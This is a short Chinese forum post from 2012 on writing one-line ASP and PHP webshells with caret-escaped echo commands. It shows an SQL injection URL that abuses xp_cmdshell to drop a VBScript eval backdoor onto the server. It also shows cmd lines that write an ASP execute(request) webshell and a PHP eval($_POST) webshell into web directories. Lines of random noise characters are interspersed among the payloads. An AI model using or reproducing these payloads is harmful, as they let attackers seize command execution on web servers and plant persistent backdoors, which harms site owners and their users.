用^转义字符来写ASP(一句话木马)文件的方法:
/ ?. q; y1 w( y& L& D
U0 X4 }6 ~9 U) w" z& X4 [4 g1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
# b$ ]2 q4 F. D, T4 h
# S1 |* A" f" B; ~% K( _% G2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
% u" f2 `6 b! K# O; n4 C3 e( c* t
; f7 a5 J: M7 m& I( S- u8 V: h- U5 s% o# S
PHP( A5 A0 t e( ~, O& H/ E" K' s2 X. [
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对